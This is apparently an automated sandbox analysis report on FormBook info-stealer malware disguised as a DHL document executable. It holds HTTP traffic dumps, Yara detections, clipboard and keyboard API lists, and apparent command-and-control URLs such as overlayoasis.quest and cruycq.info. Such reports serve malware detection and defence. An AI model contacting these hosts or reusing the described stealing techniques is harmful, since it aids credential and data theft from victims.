Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 11:24:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://overlayoasis.quest/wp-json/>; rel="https://api.w.org/"vary: accept-encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZZWJmfp5BdKD9Ev%2BCaiNIRoC2p8S5kXmjEJeFkY66fWkNXIC8sjBD7g5YpBQ22pT4HBj1gazj%2BpouBegtNfKtXxv2EVFHBJCPw4lHH2fNB%2BBNnCJIjK%2FHqVYm9d6d26IB81UqgrfBBXo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fe395101e564379-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2232&min_rtt=2232&rtt_var=1116&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=842&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6d 73 e3 b6 d5 e8 67 7b 26 ff 01 cb 9d ac a5 84 84 f8 a6 57 5b ce 93 6e 92 a7 bd d3 34 99 6c d2 ce ed ee 5e 0d 44 42 12 77 29 92 25 20 c9 ae eb ff 7e e7 00 20 45 4a a4 44 59 de 24 9d 49 da 95 49 e0 bc 01 38 38 00 0e 0e 40 84 10 ba 79 f1 cd 0f af 7f fe bf 3f 7e 8b 16 7c 19 de 7e 76 89 20 11 9e 51 48 a2 f9 58 a3 91 f1 cb 1b 2d cf a0 c4 47 01 a7 4b e6 c5 09 15 4f fc 3e a1 63 6d c1 79 32 ea 74 98 b7 a0 4b 82 e3 74 de f9 07 9d be 09 38 05 d4 0b 81 bb a4 9c 20 6f 41 52 46 f9 58 fb e5 e7 ef 8c 41 4e 57 e4 45 64 49 c7 da 3a a0 9b 24 4e b9 86 bc 38 e2 34 e2 63 6d 13 f8 7c 31 f6 e9 3a f0 a8 21 5e 74 14 44 01 0f 48 68 30 8f 84 74 6c e5 94 c2 20 fa Data Ascii: 2da9}msg{&W[n4l^DBw)% ~ EJDY$II88@y?~\|~v QHX-GKO>cmy2tKt8 oARFXANWEdI:$N84cm\|1:!^tDHh0tl
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 11:25:04 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 11:25:06 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 11:25:09 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 11:25:12 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">

Source: MSNzUrVSel.exe, 00000007.00000002.4115406780.0000000005045000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.cruycq.info
Source: MSNzUrVSel.exe, 00000007.00000002.4115406780.0000000005045000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.cruycq.info/mywm/
Source: unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: unlodctr.exe, 00000004.00000002.4114712280.0000000005014000.00000004.10000000.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000002.4113693473.0000000003C04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: unlodctr.exe, 00000004.00000002.4112047770.000000000331C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: unlodctr.exe, 00000004.00000002.4112047770.000000000331C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: unlodctr.exe, 00000004.00000002.4112047770.000000000331C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: unlodctr.exe, 00000004.00000002.4112047770.000000000331C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: unlodctr.exe, 00000004.00000002.4112047770.000000000331C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: unlodctr.exe, 00000004.00000003.2112160686.00000000082CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: unlodctr.exe, 00000004.00000002.4114712280.0000000004CF0000.00000004.10000000.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000002.4113693473.00000000038E0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://overlayoasis.quest/c83d/?Jz1hrtoh=jxTzUjVIZaofx7j
Source: unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: unlodctr.exe, 00000004.00000002.4116442701.00000000068A0000.00000004.00000800.00020000.00000000.sdmp, unlodctr.exe, 00000004.00000002.4114712280.000000000483A000.00000004.10000000.00040000.00000000.sdmp, MSNzUrVSel.exe, 00000007.00000002.4113693473.000000000342A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: unlodctr.exe, 00000004.00000003.2119967592.00000000082ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0022EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0022EAFF

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0022ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0022ED6A

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

0_2_0022EAFF

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0021AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0021AA57

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_00249576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00249576

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1931217148.00000000029B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4113279367.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1930912470.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4113355046.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4115406780.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4113347590.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4111924093.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1931729344.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: DHL DOCS 2-0106-25.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DHL DOCS 2-0106-25.exe, 00000000.00000000.1647144983.0000000000272000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_25070524-6
Source: DHL DOCS 2-0106-25.exe, 00000000.00000000.1647144983.0000000000272000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_374b1f3e-c
Source: DHL DOCS 2-0106-25.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_cf7bda76-3
